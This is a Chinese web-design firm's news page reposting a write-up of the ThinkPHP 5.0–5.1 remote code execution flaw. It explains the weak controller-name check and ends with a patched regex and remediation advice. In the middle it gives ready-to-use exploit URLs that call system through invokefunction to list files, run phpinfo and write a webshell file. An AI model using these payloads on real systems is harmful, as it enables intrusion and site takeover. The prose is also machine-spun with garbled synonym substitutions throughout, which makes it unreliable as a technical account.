商丘做网站,商丘网站优化,商丘网络推广,商丘网络公司
当前位置:首页 > 新闻资讯 > 建站经验 >

thinkphp 最新版本5.0到5.1高危漏洞爆发可直接提权getshell

发表日期:2018-12-13 11:28聚圣源浏览次数: 本文关键词:thinkphp,最,新版本,5.0,到,5.1,高危,漏洞

 

THINKPHP毛病修复,官方于克日,对现有的thinkphp5.0到5.1全部版本举行了升级,以及补丁更新,这次更新重要是举行了一些毛病修复,最严峻的就是之前存在的SQL注入毛病,以及长途代码实行查询体系的毛病都举行了修复,官方本以为没有题目了,但是在现实的宁静检测当中发明,照旧存在题目,照旧可以长途代码举行注入,插入非法字符,提交到办事器后端中去。

thinkphp 最新版本5.0到5.1高危漏洞爆发可直接提权getshell

关于这次发明的oday毛病,我们来看下官方之前更新的代码文件是怎么样的,更新的步伐文件路径是library文件夹下的think目次里的app.php,如下图:

thinkphp 最新版本5.0到5.1高危漏洞爆发可直接提权getshell

毛病产生的缘故原由就在于这个控制器这里,整个thinkphp框架里的功效对控制器没有举行严酷的宁静过滤于查抄,使打击者可以伪造恶意参数举行逼迫插入,最基础的缘故原由就是正则的表达式写的欠好,导致可以绕过。

在controller获取控制器后,直接举行赋值,但是并没有对控制器的名举行严酷的检测,导致可以利用斜杠等特别标记来长途代码注入。

我们来搭建一下网站的情况,apache+mysql+Linux centos体系,搭建好的测试情况地点是http://127.0.01/anquan ,我们可以直接在index.php背面伪造打击参数,示比方下:

http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

直接get方法提交到网站中去,可以直接查询到网站当前根目次的全部文件,截图如下:

thinkphp 最新版本5.0到5.1高危漏洞爆发可直接提权getshell

通过该毛病也可以直接长途代码注入实行phpinfo语句,查询当前的php版本,路径,扩展,以及php.ini存放的地点,都可以看得到,结构如下代码即可。

http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

thinkphp 最新版本5.0到5.1高危漏洞爆发可直接提权getshell

有些人大概会问了,既然都可以phpinfo,查询目次文件,可不可以getshell写网站木马文件到网站里呢? 答案是可以的,我们测试的时间是以一句话木马代码的写入到safe.php文件里。

http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27%27%20>%20safe.php

关于这次thinkphp的毛病使用以及阐发到此就竣事了,该毛病属于高危毛病,危害严峻性较大,许多升级更新补丁的网站都市受到打击,乃至有些网站会被挂马,那么该怎样修复thinkphp的毛病呢?更换之前的正规矩表达式即可,还必要对网站的目次举行权限摆设,防备天生php文件,对网站上的毛病举行修复,大概是对网站宁静防护参数举行重新设置,使他切合其时的网站情况。假如不懂怎样修复网站毛病,也可以找专业的网站宁静公司来处置惩罚,海内如Sinesafe和绿盟、启明星辰等宁静公司比力专业.

针对付这个环境,我们要对其library/think/App.php代码里的正规矩表达式举行变动,if (!preg_match('/^[A-Za-z][\w\.]*$/', $controller)) { throw new HttpException(404, 'controller not exists:' . $controller); }

如没特殊注明,文章均来自网络! 转载请注明来自:http://www.jushengyuan.com.cn/news/jzjy/11968.html

网站设计案例推荐

热门文章

站长工具综合查询里面SSL证书不...

SSL证书不安全是怎么回事?但是点进去这个提示后,显示的是别人的tdk是不是被劫持或者被黑了?...

日期:2018-03-27 浏览次数:2136

简洁而实用的版权信息可增色网...

打开网站,人们自然会从上往下浏览,首先映入眼帘的一定是BANNER主视觉,然后是网站主体内容部分。相比较而言,注意到网站底部版权信息的浏览者确实不多,但这并说明网站版权信...

日期:2018-09-20 浏览次数:1915

网站设计需要注意的3点问题...

对于网站设计来讲会受到很多因素的影响,而且不同类型的网站,在设计时需要体现的元素也不一样,比如说对于一个企业网站更想体现出品牌以及产品的特点,主要是对产品、企业信...

日期:2018-02-12 浏览次数:1835

企业网站为什么要改版 改版选择...

网站改版,是每个建站企业必须面临的工作。相信也有不少站长问,已经做好的企业网站,为何还要大费周章重新进行改版设计呢?下面小编就来给大家说说,企业究竟为什么要改变,并...

日期:2018-03-26 浏览次数:1376

永城网站制作:模板建站不可不...

随着互联网建站尤其是自助建站热潮不断高涨,建站行业涌现出越来越多的自助建站平台,这些平台普遍都提供网站模板可选。...

日期:2018-04-30 浏览次数:980

相关文章

「宜君县网站建设」企业网站建...

短视 萍乡 频,自媒体,达人种草一站办事 网站维护 对付企业来说,建好一个网站是美丽的开端,而网站维护才是重中之重,一样平常来说,网络建立公司第一年免费维护网站,第二年...

日期:2020-02-29 浏览次数:59

「介休市网站建设」WordPress最新...

2020年,方才开始WordPress博客体系被网站宁静检测出有插件绕过毛病,该插件的开辟公司,已升级了该插件并公布1.7版本,对从前爆出的毛病举行了修补,该企业网站毛病造成的缘故原由...

日期:2020-03-11 浏览次数:65

「上栗县网站建设」为什么在建...

企业网站在建立时,有一部门站长会为了让网站做的越发出彩选择在办事器方面压缩本钱,以是会拒绝利用独立办事器,转而选择一些较为经济的空间。这实在是一种错误的做法,办事...

日期:2020-04-12 浏览次数:59

「错那县seo」最受欢迎免费开源...

对付大多数想做网站的朋侪来说,做网站起首想到的就是下载cms体系来做,但是cms体系许多,怎么选择呢?凭据百度权重和指数(反应用户数目)排名,下面网络海内最着名的几个cms建站体...

日期:2019-11-26 浏览次数:82

「永福县网站建设」5条最佳网站...

1.可视化计划 一图解千文。照片可以表达真正有代价的内容,吸引用户的留意力,并表明一些难以明白的观点。 我们人类非常喜好可视化结果 泸州 ,想一想:你最初在这个博客上看到...

日期:2019-12-01 浏览次数:78

随机推荐

如何让百度快速收录网站内容技...

互联网+时代 你的企业“脸面”...

细节决定成败 企业网站建设在这...

Dedecms手机站三种不同建设方法和...

当代网站10大最常见和最具破坏...

教训:新站备案没通过,差点让...